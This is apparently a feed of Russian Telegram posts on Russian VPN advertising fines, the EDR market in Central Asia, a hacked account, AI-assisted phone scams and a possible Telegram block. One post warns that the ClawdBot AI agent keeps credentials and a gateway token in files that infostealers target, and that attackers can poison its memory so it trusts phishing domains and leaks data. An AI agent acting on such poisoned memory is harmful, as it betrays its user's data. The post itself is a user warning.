VPN нельзя не только рекламировать, про него в принципе писать запрещено как про способ, позволяющий обходить блокировки. За это может быть блокировка. Ответственность на рекламодателе и на рекламораспространителе. Штраф предусмотрен специальный (ч. 18 ст. 14.3 КоАП РФ) - для граждан от 50 до 80 тысяч рублей, для должностных лиц/ИП – от 80 до 150 тысяч рублей, для юрлиц – от 200 до 500 тысяч рублей.Рекламодателей (разработчиков VPN) не всегда просто найти, поэтому скорее всего штрафовать будут площадку.

EDR в Центральной Азии: из «продвинутой экзотики» — в обязательный стандартКак изменился спрос на EDR в Центральной Азии, какие отрасли приходят за ним в первую очередь, кто доминирует на рынке и на что заказчики реально смотрят при выборе решений — разбираемся с Алексеем Репиным, техдиректором MONT TECH.1️⃣ Как поменялся спрос за последнее время? За последние два-три года рынок EDR (Endpoint Detection and Response) в ЦА совершил качественный скачок: от экзотического инструмента для продвинутых до обязательного стандарта безопасности.Если три года назад компании в регионе фокусировались на классических антивирусах (EPP), то сейчас спрос сместился в сторону проактивного обнаружения.Центральная Азия, особенно Казахстан и Узбекистан, стала мишенью для APT-группировок и программ-шифровальщиков. По данным аналитических отчетов, количество атак на бизнес в регионе выросло в среднем на 20–30%.Компании осознали, что предотвратить 100% атак невозможно. Спрос на EDR вырос потому, что бизнесу нужно видеть, что именно делает злоумышленник внутри сети после взлома. Это поможет минимизировать ущерб.2️⃣ Кто представлен на рынке EDR Центральной Азии? В 2025–2026 годах этот рынок — смесь мировых гигантов и сильных региональных игроков из СНГ. Если конкретнее:➡️ лидеры из СНГ — Kaspersky, Positive Technologies;➡️ западные вендоры — CrowdStrike, SentinelOne, Trend Micro, Check Point, Eset и другие.С локальными вендорами ситуация двоякая: в регионе много хороших сервисных компаний и системных интеграторов, но собственных разработчиков коробочного EDR-софта практически нет.3️⃣ Среди каких компаний EDR особенно востребован? Сегодня за EDR чаще всего приходят компании из секторов с критической инфраструктурой и высокими финансовыми рисками. Это государственный сектор и КИИ, банки и финтех, ритейл и e-commerce.Замечу, что в Казахстане и Узбекистане приняты строгие нормы по защите критической информационной инфраструктуры (КИИ). Регуляторы требуют не просто наличия защиты, а возможности оперативного реагирования на инциденты.4️⃣ Что важно для заказчиков?Зрелые заказчики, как правило, обращают внимание на функциональность и проводят тщательное тестирование продуктов в рамках пилотов. Для них важна реальная безопасность, а цена стоит на втором месте. У остальных подход может разниться. Встречается так называемая «бумажная безопасность»: то есть закрываем то, что требует регулятор. Есть заказчики, которые действуют по принципу «лишь бы что-то было». Бывают даже случаи, когда производят частичную защиту, устанавливая EDR не на весь парк конечных устройств.5️⃣ Какую роль играет дистрибьютор в проектах по EDR?Все зависит от зрелости заказчика. Первая ситуация — он понимает, зачем нужен EDR. Тогда мы говорим о преимуществах того или иного решения. А также проводим пилоты, чтобы в реальной среде показать и помочь проверить заявленную функциональность.Вторая ситуация — далекий от ИБ заказчик. Здесь нашей задачей будет объяснить, что это за решения и зачем они нужны. Также рассказываем, какие преимущества у EDR по сравнению с классическими антивирусами.Кроме того, оказываем техническую поддержку для партнеров, у которых не хватает внутренних компетенций.#ИБ

И дублирую текстом для тех, кто предпочитает читать)Друзья, всем привет!Пишу через ассистента — пока нет доступа к своему Telegram: мой личный аккаунт взломали.Если вам приходит любая рассылка/сообщение “от меня” со ссылками или просьбами — не переходите и ничего не оплачивайте. Это мошенники. Мы уже занимаемся восстановлением и разбором ситуации.По ощущениям — интересная “лесенка” эмоций:сначала не веришь, потом паника/злость, сейчас я уже ближе к принятию и осмыслению.Главный вывод банальный, но важный: информационную безопасность нельзя недооценивать. Мы живём в век технологий — и цена расфокуса стала высокой.И ещё одно наблюдение: когда аккаунта нет — внезапно наступает тишина. И ты понимаешь, сколько времени и внимания забирает мессенджер. Это тоже про управление вниманием: если ты расфокусирован — кто-то обязательно этим воспользуется.Берегите себя и свои аккаунты 🙏Скоро вернусь в эфир — либо восстановлю доступ, либо (если потребуется) сделаем новый канал. Я сообщу здесь.

Мошенники все лучше применяют AIНа прошлой неделе в нашу семью дважды стучались мошенники и с пугающей точностью по времени.- Теща оставила заявление в поликлинике, а утром звонят с просьбой подтвердить код, чтобы завершить прикрепление. - Сыну сразу после экзамена звонил якобы курьер из OBI, назовите код из смс, чтобы курьер смог забрать посылку. Оба раза попали в нужно время с очень правдоподобными деталями. Но ни поликлиника, ни OBI никогда не просят коды подтверждения по телефону. Да, курьеры иногда просят назвать код, но только после вручения товара в руки.И причем же здесь AI, все очень просто. Нужно, массово обработать кучу информации, которая сливается из разных источников и сделать это супер оперативно, а дальше выбрать кому звонить, какой способ мошенничества выбрать, предсказать самое ожидаемое время звонка и т.д. А некоторые идут еще дальше и обзванивают автоматически, строят адаптивные сценарии с самыми приятными и убедительными голосами. Это сейчас легко и просто.✖️Очевидно, что на мошенников работают "черные DS", которые не ограничены в ресурсах. Никогда НИКОМУ не называйте коды из смс, чтобы не просили. Просто от слова НИКОГДА.Положите трубку сразу, если что-то показалось странным, не спорьте. Расскажите про эти схемы родителям, детям, друзьям. Такие преступления должны караться жестко и без каких-либо сроков давности, т.к. за ними стоит целая индустрия, которая строится на доверии и усталости людей.А вам звонили? Делитесь, может это спасет еще кого-нибудь.

ClawdBot это буквально подарок для хакеров.Разобрал, что хранится у тебя на диске, если ты им пользуешься.~/clawd/memory/memory.mdЗдесь лежит ВСЁ:- твои VPN-креды- названия компаний, с которыми работаешь- что ты гуглил в панике в 2 ночи~/.clawdbot/clawdbot.jsonА вот тут интереснее.Gateway-токен. Если его украдут то получают удалённое выполнение кода на твоей машине. Local-first они говорили.Приватность они говорили.На деле: всё что знает о тебе AI лежит в папке, которую любой инфостилер сканирует за 0.3 секунды.RedLine уже добавил %UserProfile%\.clawdbot\*.json в таргет-лист.Lumma ищет файлы со словами "secret", "config", "memory".Угадай, как называются файлы ClawdBot? Memory Poisoning.Хакер может не просто украсть данные. Он может изменить память твоего AI.Заставить его доверять фишинговым доменам. Сливать данные. Ты даже не заметишь. Итого:ClawdBot взял всё плохое от облачных AI (сбор данных) и всё плохое от локальных решений (нулевая защита).Best of both worlds. Для хакеров. Кто пользуется — проверьте папки. Ссылка на отчёт Hudson Rock 👇https://www.infostealers.com/article/clawdbot-the-new-primary-target-for-infostealers-in-the-ai-era/?trk=feed-detail_comments-list_comment-text

😭 Прощаемся с Телеграм в сентябре? К выборам «Телегу» могут заблокировать по той же системе, что и YouTube, написал зампред комитета Госдумы по экономической политике Михаил Делягин. Правда, потом добавил: это не факт и не инсайд, его личное предположение. И он лично такие меры не поддерживает.Снова в 2018? Роскомнадзор уже пытался блокировать Телеграм (а пользователи поддерживали мессенджер, как могли)Тогда технологии РКН были не такими продвинутыми, пользователи заходили в Телеграм почти без усилий. ☝️ Блокировка IP-адресов часто сопровождалась «сопутствующим уроном»: падали сторонние сайты и сервисы, и в итоге к 2020 году от таких блокировок отказались.Условия поменялись? ОднозначноК примеру, после ограничений на звонки в Телеграм, многие пользователи и правда не могут никому дозвониться. Грустно, когда ты за границей и хочешь связаться с мамой 😭Онлайн на других заблокированных платформах (в списке «Х», Discord, Roblox) снизился. Точной статистики нет, но некоторые проекты Roblox потеряли до 60% аудитории после блока.Есть «но!»: снова растет риск сопутствующего ущерба1️⃣ Ограничения — дорого: чем больше блокировок, тем больше способов их обойти. Для РКН «гонка вооружений» = финансовая нагрузка.2️⃣ Весь зашифрованный трафик заблокировать трудно. Им пользуются не только иностранные платформы, но и абсолютно легальные отечественные сервисы: авиация, банки, VK и Госуслуги. 3️⃣ В Телеграм находятся официальные каналы государственных служб, чиновников и российских СМИ. (Удаление таких каналов в свое время вызвало конфликт с YouTube). Блокировка Телеграм = потеря лояльной аудитории.4️⃣ Мошенники пользуются желанием людей вернуться в онлайн, воруют их деньги и личные данные.Часть СМИ пишет: подготовка к блоку «Телеги» уже идет. Просто власти ждут перехода основной аудитории в МАКС. Но спрогнозировать, получится ли такой трюк — мы не можем. 🤷‍♂️ Напомним, несмотря на жесткие ограничения YouTube, у этой платформы есть зрители в России. С августа 2024 к январю 2026 аудитория из РФ снизилась в десятки раз, но не до нуля.P.S. Попросили нашего эксперта Евгения Попова поделиться своим мнением. Евген был краток: «Ничего не получится»💬 Если что, пойдете читать нас в МАКСе?#новости@InvestFuture